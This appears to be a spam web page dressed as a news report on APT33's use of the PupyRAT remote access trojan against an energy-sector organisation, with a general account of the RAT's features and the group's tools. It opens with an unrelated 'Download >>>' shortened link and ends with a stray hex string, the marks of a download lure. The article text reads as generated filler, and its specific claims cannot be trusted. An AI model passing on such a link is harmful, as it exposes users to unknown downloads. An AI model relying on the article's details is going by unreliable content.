Iran Hacking Group Used Open Source Multi-platform PupyRAT To Attack Energy Sector Organization
Download >>> https://tiurll.com/2tuVXj
Iran Hacking Group Used Open Source multi-platform PupyRAT to Attack Energy Sector Organization
A recent report by security researchers revealed that an Iranian hacking group known as APT33 or Elfin used an open source multi-platform remote access trojan (RAT) called PupyRAT to target an energy sector organization in the Middle East.
PupyRAT is a cross-platform RAT that can run on Windows, Linux, macOS, Android and even embedded systems. It is written in Python and can be customized with various modules and plugins. PupyRAT can perform various malicious activities such as keylogging, screen capture, file transfer, webcam access, password dumping, process injection and more.
The researchers from Recorded Future's Insikt Group discovered that the APT33 hackers used a phishing email campaign to deliver a malicious Microsoft Excel document that contained a macro that executed a PowerShell script. The script then downloaded and executed PupyRAT on the victim's machine. The researchers observed that the attackers used PupyRAT to maintain persistence and access the victim's network for at least three weeks in January 2020.
The researchers believe that the APT33 hackers were interested in the energy sector organization's operational technology (OT) network, which controls industrial processes and critical infrastructure. The researchers also noted that the APT33 group has been active since at least 2013 and has targeted various sectors such as aerospace, defense, energy, manufacturing and telecommunications in countries such as Saudi Arabia, United States, United Kingdom, France and Germany.
The researchers advised organizations to implement security best practices such as patching systems, disabling macros, using multi-factor authentication, segmenting networks and monitoring for suspicious activity. They also recommended using threat intelligence to identify and block known indicators of compromise (IOCs) associated with PupyRAT and APT33.
PupyRAT is not the only tool that APT33 hackers use to compromise their targets. The group has also been known to use other custom and open source malware such as Nanocore, StoneDrill, Dropshot, TurnedUp and ALFZ. The group also leverages various legitimate tools such as Mimikatz, LaZagne, RDPWrap and Plink for lateral movement and credential theft.
The motivation and objectives of APT33 are not clear, but some analysts suggest that the group may be acting on behalf of the Iranian government or military. The group may be conducting espionage, sabotage or reconnaissance operations against its adversaries or potential targets. The group may also be seeking to gain access to sensitive information or intellectual property that could benefit Iran's nuclear, military or economic interests.
The threat posed by APT33 and PupyRAT should not be underestimated, especially for organizations in the energy sector or other critical infrastructure sectors. The attackers have demonstrated their ability to infiltrate and persist in their targets' networks for long periods of time, and potentially cause significant damage or disruption. Organizations should take proactive measures to protect their assets and data from this sophisticated and persistent threat actor. ec8f644aee